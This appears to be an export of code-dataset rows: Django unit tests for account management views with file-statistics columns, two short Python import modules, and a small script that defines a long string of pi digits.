self.assertContains(response, "The passwords do not match.")
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{"new_password": "", "verify_new_password": ""},
follow=True,
)
self.assertContains(response, "This field is required.")
response = self.client.post(
f"/accounts/{self.superuser.uid}/password/change/",
{"new_password": "test_password", "verify_new_password": "test_password"},
follow=True,
)
self.assertContains(
response,
"The password needs to have at least 8 characters, a letter, and a number.",
)
def test_incorrect_account(self):
"""Check password change unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/password/change/", follow=True)
self.assertContains(response, "The account doesn't exist.")
class AccountsListTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check list template"""
self.client.force_login(self.superuser)
response = self.client.get("/accounts/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/list.html")
def test_successful(self):
"""Check list successful"""
self.client.force_login(self.superuser)
response = self.client.get("/accounts/", follow=True)
self.assertContains(response, self.user.uid)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
self.assertContains(response, self.user.email)
self.assertContains(response, self.superuser.uid)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
self.assertContains(response, self.superuser.email)
def test_incorrect_permissions(self):
"""Check list unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get("/accounts/", follow=True)
self.assertContains(response, "You don't have the required permissions.")
class AccountsDetailTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check detail template"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/detail.html")
def test_successful(self):
"""Check detail successful"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertContains(response, self.user.uid)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
self.assertContains(response, self.user.email)
self.assertContains(response, self.user.company)
self.assertContains(response, self.user.address1)
self.assertContains(response, self.user.country.name)
response = self.client.get(f"/accounts/{self.superuser.uid}/", follow=True)
self.assertContains(response, self.superuser.uid)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
self.assertContains(response, self.superuser.email)
def test_incorrect_permissions(self):
"""Check detail unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertContains(response, self.user.get_full_name())
response = self.client.get(f"/accounts/{self.superuser.uid}/", follow=True)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.superuser.uid}/", follow=True)
self.assertContains(response, self.superuser.get_full_name())
response = self.client.get(f"/accounts/{self.user.uid}/", follow=True)
self.assertContains(response, self.user.get_full_name())
def test_incorrect_account(self):
"""Check detail unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/", follow=True)
self.assertContains(response, "The account doesn't exist.")
class AccountsEditTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check edit template"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/edit.html")
def test_date(self):
"""Check edit data"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertContains(response, self.user.uid)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
self.assertContains(response, self.user.email)
self.assertContains(response, self.user.company)
self.assertContains(response, self.user.address1)
self.assertContains(response, self.user.country.code)
response = self.client.get(f"/accounts/{self.superuser.uid}/edit/", follow=True)
self.assertContains(response, self.superuser.uid)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
self.assertContains(response, self.superuser.email)
def test_successful(self):
"""Check edit successful"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"uid": self.user.uid,
"email": self.user.email,
"verify_email": self.user.email,
"first_name": "John",
"last_name": "Smith",
"date_of_birth": "2000-01-01",
},
follow=True,
)
self.assertContains(response, "The account has been successfully edited.")
response = self.client.post(
f"/accounts/{self.superuser.uid}/edit/",
{
"uid": self.superuser.uid,
"email": "John.business@example.com",
"verify_email": "John.business@example.com",
"first_name": "John",
"last_name": "Doe",
"avatar": self.user.avatar_url,
},
follow=True,
)
self.assertContains(response, "The account has been successfully edited.")
def test_incorrect_permissions(self):
"""Check edit unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
response = self.client.get(f"/accounts/{self.superuser.uid}/edit/", follow=True)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/{self.superuser.uid}/edit/", follow=True)
self.assertContains(response, self.superuser.first_name)
self.assertContains(response, self.superuser.last_name)
response = self.client.get(f"/accounts/{self.user.uid}/edit/", follow=True)
self.assertContains(response, self.user.first_name)
self.assertContains(response, self.user.last_name)
def test_incorrect_email(self):
"""Check edit unsuccessful (email)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email + "1",
"first_name": self.user.first_name,
"last_name": self.user.last_name,
},
follow=True,
)
self.assertContains(response, "The emails do not match.")
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"uid": self.user.uid,
"email": "",
"verify_email": "",
"last_name": self.user.first_name,
"first_name": self.user.last_name,
},
follow=True,
)
self.assertContains(response, "This field is required.")
def test_incorrect_first_name(self):
"""Check edit unsuccessful (first name)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email,
"first_name": "!^$&#(1234",
"last_name": self.user.last_name,
},
follow=True,
)
self.assertContains(response, "Enter a valid first name.")
def test_incorrect_last_name(self):
"""Check edit unsuccessful (last name)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email,
"first_name": self.user.first_name,
"last_name": "!^$&#(1234",
},
follow=True,
)
self.assertContains(response, "Enter a valid last name.")
def test_incorrect_date_of_birth(self):
"""Check edit unsuccessful (date of birth)"""
self.client.force_login(self.superuser)
response = self.client.post(
f"/accounts/{self.user.uid}/edit/",
{
"email": self.user.email,
"verify_email": self.user.email,
"first_name": self.user.first_name,
"last_name": self.user.last_name,
"date_of_birth": "3000-01-01",
},
follow=True,
)
self.assertContains(response, "The date of birth cannot be in the future.")
def test_incorrect_account(self):
"""Check edit unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/edit/", follow=True)
self.assertContains(response, "The account doesn't exist.")
class AccountsDeleteTestCase(TestCase):
fixtures = ["tests/test_data/accounts.json", "core/fixtures/initial_data.json"]
def setUp(self):
"""Set up accounts"""
self.user = Account.objects.get(is_superuser=False)
self.superuser = Account.objects.get(is_superuser=True)
def test_template(self):
"""Check delete template"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertTemplateUsed(response, template_name="accounts/delete.html")
def test_successful(self):
"""Check delete successful"""
self.client.force_login(self.superuser)
response = self.client.post(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertContains(response, "The account has been deleted.")
def test_permissions_non_superuser(self):
"""Check delete unsuccessful (permissions)"""
self.client.force_login(self.user)
response = self.client.get(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertContains(response, "Delete")
response = self.client.get(
f"/accounts/{self.superuser.uid}/delete/", follow=True
)
self.assertContains(response, "You don't have the required permissions.")
self.client.force_login(self.superuser)
response = self.client.get(
f"/accounts/{self.superuser.uid}/delete/", follow=True
)
self.assertContains(response, "Delete")
response = self.client.get(f"/accounts/{self.user.uid}/delete/", follow=True)
self.assertContains(response, "Delete")
def test_incorrect_account(self):
"""Check delete unsuccessful (account)"""
self.client.force_login(self.superuser)
response = self.client.get(f"/accounts/999999/delete/", follow=True)
self.assertContains(response, "The account doesn't exist.")
| 42.165527
| 143
| 0.622327
| 3,337
| 30,823
| 5.643392
| 0.052442
| 0.0685
| 0.140824
| 0.110025
| 0.92826
| 0.908666
| 0.87946
| 0.857052
| 0.830076
| 0.805119
| 0
| 0.008345
| 0.249619
| 30,823
| 730
| 144
| 42.223288
| 0.805871
| 0.051293
| 0
| 0.707921
| 0
| 0.016502
| 0.274697
| 0.131017
| 0
| 0
| 0
| 0
| 0.181518
| 1
| 0.085809
| false
| 0.168317
| 0.008251
| 0
| 0.123762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
04b431ed286408a33c87e5de5fbb49cd2d958c27
| 238
|
py
|
Python
|
textattack/goal_function_results/__init__.py
|
k-ivey/TextAttack
|
47d15acea90bf92e6a7f19200a59da29e74731e6
|
[
"MIT"
] | 2
|
2021-02-22T12:15:27.000Z
|
2021-05-02T15:22:05.000Z
|
textattack/goal_function_results/__init__.py
|
k-ivey/TextAttack
|
47d15acea90bf92e6a7f19200a59da29e74731e6
|
[
"MIT"
] | null | null | null |
textattack/goal_function_results/__init__.py
|
k-ivey/TextAttack
|
47d15acea90bf92e6a7f19200a59da29e74731e6
|
[
"MIT"
] | null | null | null |
from .goal_function_result import GoalFunctionResult, GoalFunctionResultStatus
from .classification_goal_function_result import ClassificationGoalFunctionResult
from .text_to_text_goal_function_result import TextToTextGoalFunctionResult
| 47.6
| 81
| 0.92437
| 23
| 238
| 9.130435
| 0.521739
| 0.171429
| 0.257143
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 238
| 4
| 82
| 59.5
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
04c396e919649917ce01156e0beac8338cb3d1fd
| 120
|
py
|
Python
|
gym_tictactoe_np/agents/__init__.py
|
IshanManchanda/gym-3d-tictactoe-np
|
b1788deeb8b1dd3e79ef78f996969e2d71dd3a39
|
[
"MIT"
] | 1
|
2021-10-05T13:09:11.000Z
|
2021-10-05T13:09:11.000Z
|
gym_tictactoe_np/agents/__init__.py
|
IshanManchanda/gym-tictactoe-np
|
b1788deeb8b1dd3e79ef78f996969e2d71dd3a39
|
[
"MIT"
] | null | null | null |
gym_tictactoe_np/agents/__init__.py
|
IshanManchanda/gym-tictactoe-np
|
b1788deeb8b1dd3e79ef78f996969e2d71dd3a39
|
[
"MIT"
] | null | null | null |
from gym_tictactoe_np.agents.agent_human import HumanAgent
from gym_tictactoe_np.agents.agent_random import RandomAgent
| 40
| 60
| 0.9
| 18
| 120
| 5.666667
| 0.611111
| 0.137255
| 0.313725
| 0.352941
| 0.568627
| 0.568627
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 120
| 2
| 61
| 60
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
04ffb707df585f417ad260feac2b93e51dfd04e4
| 102,580
|
py
|
Python
|
pi beat.py
|
flyinghippopotamus314159/Music-player
|
b7dfcfd1a07a7a4fc494777d459ca5636b798bc2
|
[
"MIT"
] | null | null | null |
pi beat.py
|
flyinghippopotamus314159/Music-player
|
b7dfcfd1a07a7a4fc494777d459ca5636b798bc2
|
[
"MIT"
] | null | null | null |
pi beat.py
|
flyinghippopotamus314159/Music-player
|
b7dfcfd1a07a7a4fc494777d459ca5636b798bc2
|
[
"MIT"
] | null | null | null |
import winsound, time
start=input("Press enter to start playing pi")
time.sleep(10)
pi='3141592653589793238462643383279502884197169399375105820974944592307816406286208998628034825342117067982148086513282306647093844609550582231725359408128481117450284102701938521105559644622948954930381964428810975665933446128475648233786783165271201909145648566923460348610454326648213393607260249141273724587006606315588174881520920962829254091715364367892590360011330530548820466521384146951941511609433057270365759591953092186117381932611793105118548074462379962749567351885752724891227938183011949129833673362440656643086021394946395224737190702179860943702770539217176293176752384674818467669405132000568127145263560827785771342757789609173637178721468440901224953430146549585371050792279689258923542019956112129021960864034418159813629774771309960518707211349999998372978049951059731732816096318595024459455346908302642522308253344685035261931188171010003137838752886587533208381420617177669147303598253490428755468731159562863882353787593751957781857780532171226806613001927876611195909216420198938095257201065485863278865936153381827968230301952035301852968995773622599413891249721775283479131515574857242454150695950829533116861727855889075098381754637464939319255060400927701671139009848824012858361603563707660104710181942955596198946767837449448255379774726847104047534646208046684259069491293313677028989152104752162056966024058038150193511253382430035587640247496473263914199272604269922796782354781636009341721641219924586315030286182974555706749838505494588586926995690927210797509302955321165344987202755960236480665499119881834797753566369807426542527862551818417574672890977772793800081647060016145249192173217214772350141441973568548161361157352552133475741849468438523323907394143334547762416862518983569485562099219222184272550254256887671790494601653466804988627232791786085784383827967976681454100953883786360950680064225125205117392984896084128488626945604241965285022210661186306744278622039194945047123713786960956364371917287467764657573962413890865832645995813390478027
59009946576407895126946839835259570982582262052248940772671947826848260147699090264013639443745530506820349625245174939965143142980919065925093722169646151570985838741059788595977297549893016175392846813826868386894277415599185592524595395943104997252468084598727364469584865383673622262609912460805124388439045124413654976278079771569143599770012961608944169486855584840635342207222582848864815845602850601684273945226746767889525213852254995466672782398645659611635488623057745649803559363456817432411251507606947945109659609402522887971089314566913686722874894056010150330861792868092087476091782493858900971490967598526136554978189312978482168299894872265880485756401427047755513237964145152374623436454285844479526586782105114135473573952311342716610213596953623144295248493718711014576540359027993440374200731057853906219838744780847848968332144571386875194350643021845319104848100537061468067491927819119793995206141966342875444064374512371819217999839101591956181467514269123974894090718649423196156794520809514655022523160388193014209376213785595663893778708303906979207734672218256259966150142150306803844773454920260541466592520149744285073251866600213243408819071048633173464965145390579626856100550810665879699816357473638405257145910289706414011097120628043903975951567715770042033786993600723055876317635942187312514712053292819182618612586732157919841484882916447060957527069572209175671167229109816909152801735067127485832228718352093539657251210835791513698820914442100675103346711031412671113699086585163983150197016515116851714376576183515565088490998985998238734552833163550764791853589322618548963213293308985706420467525907091548141654985946163718027098199430992448895757128289059232332609729971208443357326548938239119325974636673058360414281388303203824903758985243744170291327656180937734440307074692112019130203303801976211011004492932151608424448596376698389522868478312355265821314495768572624334418930396864262434107732269780280731891544110104468232527162010526522721116
60396665573092547110557853763466820653109896526918620564769312570586356620185581007293606598764861179104533488503461136576867532494416680396265797877185560845529654126654085306143444318586769751456614068007002378776591344017127494704205622305389945613140711270004078547332699390814546646458807972708266830634328587856983052358089330657574067954571637752542021149557615814002501262285941302164715509792592309907965473761255176567513575178296664547791745011299614890304639947132962107340437518957359614589019389713111790429782856475032031986915140287080859904801094121472213179476477726224142548545403321571853061422881375850430633217518297986622371721591607716692547487389866549494501146540628433663937900397692656721463853067360965712091807638327166416274888800786925602902284721040317211860820419000422966171196377921337575114959501566049631862947265473642523081770367515906735023507283540567040386743513622224771589150495309844489333096340878076932599397805419341447377441842631298608099888687413260472156951623965864573021631598193195167353812974167729478672422924654366800980676928238280689964004824354037014163149658979409243237896907069779422362508221688957383798623001593776471651228935786015881617557829735233446042815126272037343146531977774160319906655418763979293344195215413418994854447345673831624993419131814809277771038638773431772075456545322077709212019051660962804909263601975988281613323166636528619326686336062735676303544776280350450777235547105859548702790814356240145171806246436267945612753181340783303362542327839449753824372058353114771199260638133467768796959703098339130771098704085913374641442822772634659470474587847787201927715280731767907707157213444730605700733492436931138350493163128404251219256517980694113528013147013047816437885185290928545201165839341965621349143415956258658655705526904965209858033850722426482939728584783163057777560688876446248246857926039535277348030480290058760758251047470916439613626760449256274204208320856611906254543372131535958450687
72460290161876679524061634252257719542916299193064553779914037340432875262888963995879475729174642635745525407909145135711136941091193932519107602082520261879853188770584297259167781314969900901921169717372784768472686084900337702424291651300500516832336435038951702989392233451722013812806965011784408745196012122859937162313017114448464090389064495444006198690754851602632750529834918740786680881833851022833450850486082503930213321971551843063545500766828294930413776552793975175461395398468339363830474611996653858153842056853386218672523340283087112328278921250771262946322956398989893582116745627010218356462201349671518819097303811980049734072396103685406643193950979019069963955245300545058068550195673022921913933918568034490398205955100226353536192041994745538593810234395544959778377902374216172711172364343543947822181852862408514006660443325888569867054315470696574745855033232334210730154594051655379068662733379958511562578432298827372319898757141595781119635833005940873068121602876496286744604774649159950549737425626901049037781986835938146574126804925648798556145372347867330390468838343634655379498641927056387293174872332083760112302991136793862708943879936201629515413371424892830722012690147546684765357616477379467520049075715552781965362132392640616013635815590742202020318727760527721900556148425551879253034351398442532234157623361064250639049750086562710953591946589751413103482276930624743536325691607815478181152843667957061108615331504452127473924544945423682886061340841486377670096120715124914043027253860764823634143346235189757664521641376796903149501910857598442391986291642193994907236234646844117394032659184044378051333894525742399508296591228508555821572503107125701266830240292952522011872676756220415420516184163484756516999811614101002996078386909291603028840026910414079288621507842451670908700069928212066041837180653556725253256753286129104248776182582976515795984703562226293486003415872298053498965022629174878820273420922224533985626476691490556284250
39127577102840279980663658254889264880254566101729670266407655904290994568150652653053718294127033693137851786090407086671149655834343476933857817113864558736781230145876871266034891390956200993936103102916161528813843790990423174733639480457593149314052976347574811935670911013775172100803155902485309066920376719220332290943346768514221447737939375170344366199104033751117354719185504644902636551281622882446257591633303910722538374218214088350865739177150968288747826569959957449066175834413752239709683408005355984917541738188399944697486762655165827658483588453142775687900290951702835297163445621296404352311760066510124120065975585127617858382920419748442360800719304576189323492292796501987518721272675079812554709589045563579212210333466974992356302549478024901141952123828153091140790738602515227429958180724716259166854513331239480494707911915326734302824418604142636395480004480026704962482017928964766975831832713142517029692348896276684403232609275249603579964692565049368183609003238092934595889706953653494060340216654437558900456328822505452556405644824651518754711962184439658253375438856909411303150952617937800297412076651479394259029896959469955657612186561967337862362561252163208628692221032748892186543648022967807057656151446320469279068212073883778142335628236089632080682224680122482611771858963814091839036736722208883215137556003727983940041529700287830766709444745601345564172543709069793961225714298946715435784687886144458123145935719849225284716050492212424701412147805734551050080190869960330276347870810817545011930714122339086639383395294257869050764310063835198343893415961318543475464955697810382930971646514384070070736041123735998434522516105070270562352660127648483084076118301305279320542746286540360367453286510570658748822569815793678976697422057505968344086973502014102067235850200724522563265134105592401902742162484391403599895353945909440704691209140938700126456001623742880210927645793106579229552498872758461012648369998922569596881592056001016552563
75678566722796619885782794848855834397518744545512965634434803966420557982936804352202770984294232533022576341807039476994159791594530069752148293366555661567873640053666564165473217043903521329543529169414599041608753201868379370234888689479151071637852902345292440773659495630510074210871426134974595615138498713757047101787957310422969066670214498637464595280824369445789772330048764765241339075920434019634039114732023380715095222010682563427471646024335440051521266932493419673977041595683753555166730273900749729736354964533288869844061196496162773449518273695588220757355176651589855190986665393549481068873206859907540792342402300925900701731960362254756478940647548346647760411463233905651343306844953979070903023460461470961696886885014083470405460742958699138296682468185710318879065287036650832431974404771855678934823089431068287027228097362480939962706074726455399253994428081137369433887294063079261595995462624629707062594845569034711972996409089418059534393251236235508134949004364278527138315912568989295196427287573946914272534366941532361004537304881985517065941217352462589548730167600298865925786628561249665523533829428785425340483083307016537228563559152534784459818313411290019992059813522051173365856407826484942764411376393866924803118364453698589175442647399882284621844900877769776312795722672655562596282542765318300134070922334365779160128093179401718598599933849235495640057099558561134980252499066984233017350358044081168552653117099570899427328709258487894436460050410892266917835258707859512983441729535195378855345737426085902908176515578039059464087350612322611200937310804854852635722825768203416050484662775045003126200800799804925485346941469775164932709504934639382432227188515974054702148289711177792376122578873477188196825462981268685817050740272550263329044976277894423621674119186269439650671515779586756482399391760426017633870454990176143641204692182370764887834196896861181558158736062938603810171215855272668300823834046564758804051380801633638874216
37140643549556186896411228214075330265510042410489678352858829024367090488711819090949453314421828766181031007354770549815968077200947469613436092861484941785017180779306810854690009445899527942439813921350558642219648349151263901280383200109773868066287792397180146134324457264009737425700735921003154150893679300816998053652027600727749674584002836240534603726341655425902760183484030681138185510597970566400750942608788573579603732451414678670368809880609716425849759513806930944940151542222194329130217391253835591503100333032511174915696917450271494331515588540392216409722910112903552181576282328318234254832611191280092825256190205263016391147724733148573910777587442538761174657867116941477642144111126358355387136101102326798775641024682403226483464176636980663785768134920453022408197278564719839630878154322116691224641591177673225326433568614618654522268126887268445968442416107854016768142080885028005414361314623082102594173756238994207571362751674573189189456283525704413354375857534269869947254703165661399199968262824727064133622217892390317608542894373393561889165125042440400895271983787386480584726895462438823437517885201439560057104811949884239060613695734231559079670346149143447886360410318235073650277859089757827273130504889398900992391350337325085598265586708924261242947367019390772713070686917092646254842324074855036608013604668951184009366860954632500214585293095000090715105823626729326453738210493872499669933942468551648326113414611068026744663733437534076429402668297386522093570162638464852851490362932019919968828517183953669134522244470804592396602817156551565666111359823112250628905854914509715755390024393153519090210711945730024388017661503527086260253788179751947806101371500448991721002220133501310601639154158957803711779277522597874289191791552241718958536168059474123419339842021874564925644346239253195313510331147639491199507285843065836193536932969928983791494193940608572486396883690326556436421664425760791471086998431573374964883529276932822076294
72823815374099615455987982598910937171262182830258481123890119682214294576675807186538065064870261338928229949725745303328389638184394477077940228435988341003583854238973542439564755568409522484455413923941000162076936368467764130178196593799715574685419463348937484391297423914336593604100352343777065888677811394986164787471407932638587386247328896456435987746676384794665040741118256583788784548581489629612739984134427260860618724554523606431537101127468097787044640947582803487697589483282412392929605829486191966709189580898332012103184303401284951162035342801441276172858302435598300320420245120728725355811958401491809692533950757784000674655260314461670508276827722235341911026341631571474061238504258459884199076112872580591139356896014316682831763235673254170734208173322304629879928049085140947903688786878949305469557030726190095020764334933591060245450864536289354568629585313153371838682656178622736371697577418302398600659148161640494496501173213138957470620884748023653710311508984279927544268532779743113951435741722197597993596852522857452637962896126915723579866205734083757668738842664059909935050008133754324546359675048442352848747014435454195762584735642161981340734685411176688311865448937769795665172796623267148103386439137518659467300244345005449953997423723287124948347060440634716063258306498297955101095418362350303094530973358344628394763047756450150085075789495489313939448992161255255977014368589435858775263796255970816776438001254365023714127834679261019955852247172201777237004178084194239487254068015560359983905489857235467456423905858502167190313952629445543913166313453089390620467843877850542393905247313620129476918749751910114723152893267725339181466073000890277689631148109022097245207591672970078505807171863810549679731001678708506942070922329080703832634534520380278609905569001341371823683709919495164896007550493412678764367463849020639640197666855923356546391383631857456981471962108410809618846054560390384553437291414465134749407848844237721751543
34260306698831768331001133108690421939031080143784334151370924353013677631084913516156422698475074303297167469640666531527035325467112667522460551199581831963763707617991919203579582007595605302346267757943936307463056901080114942714100939136913810725813781357894005599500183542511841721360557275221035268037357265279224173736057511278872181908449006178013889710770822931002797665935838758909395688148560263224393726562472776037890814458837855019702843779362407825052704875816470324581290878395232453237896029841669225489649715606981192186584926770403956481278102179913217416305810554598801300484562997651121241536374515005635070127815926714241342103301566165356024733807843028655257222753049998837015348793008062601809623815161366903341111386538510919367393835229345888322550887064507539473952043968079067086806445096986548801682874343786126453815834280753061845485903798217994599681154419742536344399602902510015888272164745006820704193761584547123183460072629339550548239557137256840232268213012476794522644820910235647752723082081063518899152692889108455571126603965034397896278250016110153235160519655904211844949907789992007329476905868577878720982901352956613978884860509786085957017731298155314951681467176959760994210036183559138777817698458758104466283998806006162298486169353373865787735983361613384133853684211978938900185295691967804554482858483701170967212535338758621582310133103877668272115726949518179589754693992642197915523385766231676275475703546994148929041301863861194391962838870543677743224276809132365449485366768000001065262485473055861598999140170769838548318875014293890899506854530765116803337322265175662207526951791442252808165171667766727930354851542040238174608923283917032754257508676551178593950027933895920576682789677644531840404185540104351348389531201326378369283580827193783126549617459970567450718332065034556644034490453627560011250184335607361222765949278393706478426456763388188075656121689605041611390390639601620221536849410926053876887148379895599991120
99164646441191856827700457424343402167227644558933012778158686952506949936461017568506016714535431581480105458860564550133203758645485840324029871709348091055621167154684847780394475697980426318099175642280987399876697323769573701580806822904599212366168902596273043067931653114940176473769387351409336183321614280214976339918983548487562529875242387307755955595546519639440182184099841248982623673771467226061633643296406335728107078875816404381485018841143188598827694490119321296827158884133869434682859006664080631407775772570563072940049294030242049841656547973670548558044586572022763784046682337985282710578431975354179501134727362577408021347682604502285157979579764746702284099956160156910890384582450267926594205550395879229818526480070683765041836562094555434613513415257006597488191634135955671964965403218727160264859304903978748958906612725079482827693895352175362185079629778514618843271922322381015874445052866523802253284389137527384589238442253547265309817157844783421582232702069028723233005386216347988509469547200479523112015043293226628272763217790884008786148022147537657810581970222630971749507212724847947816957296142365859578209083073323356034846531873029302665964501371837542889755797144992465403868179921389346924474198509733462679332107268687076806263991936196504409954216762784091466985692571507431574079380532392523947755744159184582156251819215523370960748332923492103451462643744980559610330799414534778457469999212859999939961228161521931488876938802228108300198601654941654261696858678837260958774567618250727599295089318052187292461086763995891614585505839727420980909781729323930106766386824040111304024700735085782872462713494636853181546969046696869392547251941399291465242385776255004748529547681479546700705034799958886769501612497228204030399546327883069597624936151010243655535223069061294938859901573466102371223547891129254769617600504797492806072126803922691102777226102544149221576504508120677173571202718024296810620377657883716690910941807448781404907
55178203856539099104775941413215432844062503018027571696508209642734841469572639788425600845312140659358090412711359200419759851362547961606322887361813673732445060792441176399759746193835845749159880976674470930065463424234606342374746660804317012600520559284936959414340814685298150539471789004518357551541252235905906872648786357525419112888773717663748602766063496035367947026923229718683277173932361920077745221262475186983349515101986426988784717193966497690708252174233656627259284406204302141137199227852699846988477023238238400556555178890876613601304770984386116870523105531491625172837327286760072481729876375698163354150746088386636406934704372066886512756882661497307886570156850169186474885416791545965072342877306998537139043002665307839877638503238182155355973235306860430106757608389086270498418885951380910304235957824951439885901131858358406674723702971497850841458530857813391562707603563907639473114554958322669457024941398316343323789759556808568362972538679132750555425244919435891284050452269538121791319145135009938463117740179715122837854601160359554028644059024964669307077690554810288502080858008781157738171917417760173307385547580060560143377432990127286772530431825197579167929699650414607066457125888346979796429316229655201687973000356463045793088403274807718115553309098870255052076804630346086581653948769519600440848206596737947316808641564565053004988161649057883115434548505266006982309315777650037807046612647060214575057932709620478256152471459189652236083966456241051955105223572397395128818164059785914279148165426328920042816091369377737222999833270820829699557377273756676155271139225880552018988762011416800546873655806334716037342917039079863965229613128017826797172898229360702880690877686605932527463784053976918480820410219447197138692560841624511239806201131845412447820501107987607171556831540788654390412108730324020106853419472304766667217498698685470767812051247367924791931508564447753798537997322344561227858432968466475133365736923872014647236
79427870042503255589926884349592876124007558756946413705625140011797133166207153715436006876477318675587148783989081074295309410605969443158477539700943988394914432353668539209946879645066533985738887866147629443414010498889931600512076781035886116602029611936396821349607501116498327856353161451684576956871090029997698412632665023477167286573785790857466460772283415403114415294188047825438761770790430001566986776795760909966936075594965152736349811896413043311662774712338817406037317439705406703109676765748695358789670031925866259410510533584384656023391796749267844763708474978333655579007384191473198862713525954625181604342253729962863267496824058060296421146386436864224724887283434170441573482481833301640566959668866769563491416328426414974533349999480002669987588815935073578151958899005395120853510357261373640343675347141048360175464883004078464167452167371904831096767113443494819262681110739948250607394950735031690197318521195526356325843390998224986240670310768318446607291248747540316179699411397387765899868554170318847788675929026070043212666179192235209382278788809886335991160819235355570464634911320859189796132791319756490976000139962344455350143464268604644958624769094347048293294140411146540923988344435159133201077394411184074107684981066347241048239358274019449356651610884631256785297769734684303061462418035852933159734583038455410337010916767763742762102137013548544509263071901147318485749233181672072137279355679528443925481560913728128406333039373562420016045664557414588166052166608738748047243391212955877763906969037078828527753894052460758496231574369171131761347838827194168606625721036851321566478001476752310393578606896111259960281839309548709059073861351914591819510297327875571049729011487171897180046961697770017913919613791417162707018958469214343696762927459109940060084983568425201915593703701011049747339493877885989417433031785348707603221982970579751191440510994235883034546353492349826883624043327267415540301619505680654180939409982020609994140
